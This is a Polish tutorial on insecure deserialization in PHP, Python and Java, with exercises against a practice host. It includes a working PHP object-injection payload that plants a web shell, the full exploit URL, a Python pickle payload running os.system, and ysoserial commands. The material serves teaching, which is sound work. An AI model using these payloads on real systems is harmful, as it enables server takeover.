# Niebezpieczna deserializacja
Deserializacja to jeden z najpoważniejszych błędów w obecnych aplikacjach. Świadczy o tym przede wszystkim multum błędów czy pierwszy bug hunter, który zarobił ponad milion dolarów w rok wykorzystując właśnie ten rodzaj błędu. 
Dodatkowo deserializacja nie jest często łatwym błędem do wykorzystania. O ile błędy typu injection są już dobrze znane wśród programistów tak deserializacja pozostaje tajemnicą dla większości deweloperów. Nie mówiąc już o skutecznej obronie przed atakami opierającymi się na deserializacji. 
Kolejnym aspektem jest bardzo szerokie spektrum wykorzystania klas w niebezpiecznym użyciu deserializacji. To tylko jedne z głównych powód dla których warto skupić się na tym rodzaju błędów. Warto też wspomnieć o OWASP Top Ten 2021, który wymienia deserializację w jednej z kategorii: "Software and Data Integrity Failures A08:2021".

## Czym jest serializacja i deserializacja?
Serializacją nazywamy operację zamieniającą obiekty w ciąg bajtów, która może być w późniejszym czasie odtworzona. 
Wobec tego, główną funkcjonalnością jest możliwość łatwego przesyłania obiektów w formie np. tekstu. Z punktu programistycznego jest to bardzo przydatna funkcjonalność. Niestety, często niesie za sobą ryzyko, które może prowadzić nawet do przejęcia kontroli nad serwerem.
Błędy bezpieczeństwa czają się przy deserializacji, czyli zamianie tekstu na obiekty. Ze względu na to, że w każdym języku deserializacja wygląda trochę inaczej, przejdę pokrótce przez popularne języki i wyjaśnię błędy związane z tą funkcjonalnością.
Warto zwrócić uwagę na to, że ze względu na budowę oraz prezentację w formie kodowania, serializacja danych może być często szybko rozpoznana. Po pierwsze obiekty zapisane w pewien charakterystyczny sposób szczególnie na początku, a następnie zakodowane Base64 pozostawiają po sobie ślad, który nie ma wpływu na bezpieczeństwo, ale pozwala rozpoznać czy mamy do czynienia z serializowanym obiektem oraz w jakim języku obiekt jest złożony.
Tym tematem również zajmę się w późniejszym czasie kiedy będę opisywał serializację w różnych językach.

## Gadget chains w deserializacji
Tak jak w SSTI czasami w deserializacji nie można wykorzystać obiektu obecnie używanego. W związku z tym powstały narzędzia, które pozwalają w większości przypadków stworzyć tzw. łańcuszek gadżetów, czyli odwoływanie się do wielu klas tak, aby na końcu dostać dostęp do metody, która pozwala chociażby na czytanie pliku lub wykonywanie poleceń w systemie.

## Deserializacja w PHP, czyli PHP Object Injection
W PHP zwrócę przede wszystkim uwagę na dwie metody
```php
serialize()
unserialize()
```
Najbardziej interesującą jest oczywiście metoda `unserialize`. Już w [dokumentacji PHP](https://www.php.net/manual/en/function.unserialize.php) jest ona oznaczona jako niebezpieczna mimo to bardzo często wykorzystywana. Zanim jednak zajmę się teoretycznym wyjaśnieniem podatności zaprezentuję jak wygląda klasa w PHP, jak się korzysta z serializacji i jak wyglądają zserializowane dane.
```php
<?php
    // /src/vuln/deserialization/deserialize.php
    class Course { // definicja klasy o nazwie Kurs
        public $name; // atrybut klasy Kurs
        
        function __construct($name) { // Konstruktor klasy Kurs
            $this->name = $name; // przypisanie do atrybutu $name zawartości podanej podczas tworzenia obiektu
        }
    }
    $obj = new Course("Test"); // Tworzenie obiektu korzystając ze zdefiniowanego konstruktora
    $serobj = serialize($obj);
    echo "$serobj\n\n"; // Serializacja obiektu do ciągu bajtów oraz jego wyświetlenie
    var_dump(unserialize($serobj)); // a to niebezpieczne użycie funkcji unserialize, var_dump pozwala dowiedzieć się trochę więcej o danych deserializowanych
?>
```
Teraz wystarczy wykonać kod PHP np.
```sh
php src/vuln/deserialization/deserialize.php
```
Wynik kodu:
```php
O:6:"Course":1:{s:4:"name";s:4:"Test";}

object(Course)#2 (1) {
  ["name"]=>
  string(4) "Test"
}
```

W pierwszej linii znajduje się ciąg bajtów reprezentujący zserializowany obiekt, a w kolejnych już obiekt po deserializacji.
Analizując dokładnie zserializowany obiekt można łatwo przekonać się, że nie ma tu żadnej magii, ale zwykła notacja pomagająca zapisać obiekty.
Zaczynając od lewej, "O" oznacza obiekt następnie 6:"Course" oznacza klasę o długości nazwy sześciu znaków i nazwie Course. Następnie "1" oznacza jedno pole w klasie czyli jeden atrybut, a w nim dwa atrybutu o długości 4 i o wybranych nazwach. "s" oznacza string. 
Warto zwrócić uwagę na to, że deserializacji uległy tylko pola klasy, ale nie metody.
Jak widać serializacja jest dosyć prosta. Skoro metody nie są zapisywane a tym samym wywoływane to ciężko będzie wykorzystać tylko atrybuty. 
Na szczęście w PHP istnieją tzw. "magic methods" czyli metody wykonujące się w specyficznych warunkach.
```php
__wakeup() # wywoływana po deserializacji obiektu
__destruct() # wywoływany po zakończeniu życia obiektu
```
oraz wiele innych. Jednak to z tych najczęściej się korzysta.
Uprzedzając fakty metoda `__wakeup` nie wykona się ze względów, które później postaram się rozjaśnić. Natomiast metoda `__destruct` wykona się w zdecydowanej większości przypadków.
W skrócie jeżeli w kodzie mamy do czynienia z funkcją `unserialize`, która jest niebezpieczna i ze względu na samą specyfikę języka w zdecydowanej części przypadków jest wywoływana metoda `__destruct` to wykorzystanie podatności deserializacji jest prawie na pewno możliwe. Czasami jednak niemożliwe jest skorzystanie z magicznych metod wtedy należy opierać swoje exploity na innych metodach, które bardzo często występują np. w innych bibliotekach PHP.
Wspomniałem przed chwilą o sprawdzeniu czy podatność nie występuje w kodzie źródłowym, ale w prawie każdym przypadku dostępu do kodu źródłowego nie będzie. Wobec tego często niestety trzeba strzelać na ślepo i podawać złośliwe dane licząc na to, że uda się to wykorzystać. To główna trudność w wykorzystaniu deserializacji.

## Ćwiczenie: Deserializacja w PHP, wykorzystanie podatności
Spróbujmy teraz wykorzystać klasę i słabość funkcji `unserialize`, żeby wykonać dowolny kod RCE. Przypuśmy, że na pewnej stronie internetowej, na serwerze jest pożniży kod PHP.

http://vuln.vms.perkmylife.com:82/deserialize-logger.php
```php
<?php
// /src/vuln/deserialization/deserialize-logger.php
class Logger {
    function __construct($filename, $content) {
        $this->filename = $filename . ".log";
        $this->content = $content;
    }
    
    function __destruct() {
        file_put_contents($this->filename, $this->content);
    }
}

unserialize($_GET['data']);
?>
```
Klasa Logger w konstruktorze ustawia plik z rozszerzeniem log oraz jego zawartość - najpewniej logi. W destruktorze zawartość jest zapisywana do plików. Celem tego zadania jest zapisanie złośliwego kodu PHP do pliku z rozszerzeniem php.
W tym celu trzeba zmienić parametry klasy i wysłać taki złośliwy obiekt do aplikacji.
Zacznijmy od stworzenia klasy ze złośliwymi danymi
```php
<?php
// /src/vuln/deserialization/deserialize-logger-exploit.php
class Logger {
    public $filename = "shell.php";
    public $content = "<?php system (\$_GET['cmd']) ?>";
}
```
Teraz trzeba stworzyć obiekt klasy, zserializować ją i wypisać na wyjściu. Dopisujemy więc kilka linijek
```php
<?php
// /src/vuln/deserialization/deserialize-logger-exploit.php
class Logger {
    public $filename = "shell.php";
    public $content = "<?php system (\$_GET['cmd']) ?>";
}

$obj = new Logger();
echo serialize($obj);
?>
```
`php /var/www/vuln/deserialization/deserialize-logger-exploit.php`

Taki zserializowany obiekt możemy wkleić w parametrze data, wysłać go do strony:
http://vuln.vms.perkmylife.com:82/deserialize-logger.php serwowanej z pliku: `src/vuln/deserialization/deserialize-logger.php` i cieszyć się RCE!

```haskell
# Wstrzykujemy exploit'a w parametr data, który następnie jest przekazany do podatnej metody unserialize($_GET['data']);
http://vuln.vms.perkmylife.com:82/deserialize-logger.php?data=O:6:"Logger":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:30:"<?php system ($_GET['cmd']) ?>";}

# Wyświetlamy wynik zdalnie wykonanej komendy (Remotely Executed Command) ls -la
http://vuln.vms.perkmylife.com:82/shell.php?cmd=ls%20-la%20*
```


## Ćwiczenie: Deserializacja w Pythonie
Deserializacja w Pythonie działa na podobnej zasadzie co deserializacja w PHP. Przede wszystkim Python używa metod:
```python
dumps() # zwraca zserializowany obiekt
loads() # zwraca zdeserializowany obiekt
```
Warto zwrócić uwagę, że zserializowany obiekt w Pythonie występuje w postaci binarnej, a nie w postaci tekstu, jak było to w przypadku PHP. W związku z tym często takie ciągi są kodowane w Base64.
Poniżej przykładowe użycie serializacji w Pythonie:
```py
# /src/vuln/deserialization/deserialize.py
import pickle, datetime # Importowanie potrzebnych modułów

now = datetime.datetime.now() # Zwracanie obecnej daty
serialized_object = pickle.dumps(now) # Serializowanie obiektu

print(pickled) # Wyświetlenie zserializowanego obiektu

unserialized_object = pickle.loads(serialized_object) # Deserializacja obiektu

print(unserialized_object) # Wyświetlenie zdeserializowanego obiektu
```

Tak jak w PHP możemy stworzyć złośliwy obiekt:
```py
# /src/vuln/deserialization/deserialize2.py
import pickle, os, base64

class MaliciousObject(object):
    def __reduce__(self):
        return (os.system, ("id",))

print(base64.b64encode(pickle.dumps(MaliciousObject())))
```
Taki obiekt teraz wykonuje już polecenie `id` czyli mamy kontrolę nad serwerem.
Na koniec, aby wyświetlić sobie efekt naszego wykorzystania podatności przekażmy jeszcze zakodowany w base64 zserializowany obiekt, jako argmument poniższego programu:
```py
# /src/vuln/deserialization/deserialize-output.py
import pickle, sys, base64

data = pickle.loads(base64.b64decode(sys.argv[1]))
```
Jak widać w Pythonie wystarczy stworzyć jakąkolwiek klasę, gdzie w PHP klasa musiała odwzorowywać tę oryginalną.

## Deserializacja w Javie
Dane zserializowane w Javie mają postać binarną co wymusza w wielu sytuacjach korzystanie z kodowania Base64. Tak jak w innych językach Java również ma swoje metody na serializowanie i deserializowanie obiektów, kolejno:
```java
writeObject()
readObject()
```
W przypadku Javy nie ma możliwości wstrzykiwania odpowiednio spreparowanych obiektów jak w PHP, czy wstrzykiwania dowolnych obiektów jak w Pythonie. 

W przypadku Javy sytuacja jest trochę trudniejsza. W PHP zazwyczaj do ataku wykorzystuje się tzw. gadget chainsy o których już wspominałem. Jednak w przypadku Javy, najczęściej korzysta się z narzędzia [ysoserial](https://github.com/frohoff/ysoserial), które potrafi stworzyć exploity na przeróżne biblioteki Javy. Dużą zaletą jest to, że większość tych bibliotek Javy jest wykorzystywana na co dzień, bo trzeba wiedzieć o tym, że nia ma żadnego skutecznie działającego gadget chain na język Java. W związku tym każdy atak na funkcję deserializującą w Javie będzie polegał na bibliotekach, które bardzo często wspólnie z Javą występują.
```sh
git clone https://github.com/frohoff/ysoserial
```
Użycie programu ysoserial jest proste:
```haskell
java -jar ysoserial.jar [ library ] [ cmd ]
// Na przykład
java -jar ysoserial.jar CommonsCollections1 id
```
Oczywiście warto próbować ataku z innymi bibliotekami, aż do skutku.

## Ćwiczenie
Na hoście
```haskell
http://vuln.vms.perkmylife.com:82
```
można znaleźć ćwiczenie, które wykorzystuje klasę:
```php
<?php
class Logger {
    function __construct($filename, $content) {
        $this->filename = $filename . ".log";
        $this->content = $content;
    }
    
    function __destruct() {
        file_put_contents($this->filename, $this->content)
    }
}
?>
```
do zapisywania logów. 

Obiekt podawany jest w ciasteczku. Znając te informacje, spróbuj przejąć kontrolę nad serwerem tj. wykonując dowolne polecenie w terminalu.
Wskazówka:
W celach zgodności z danymi złośliwy obiekt powinien być zakodowany w Base64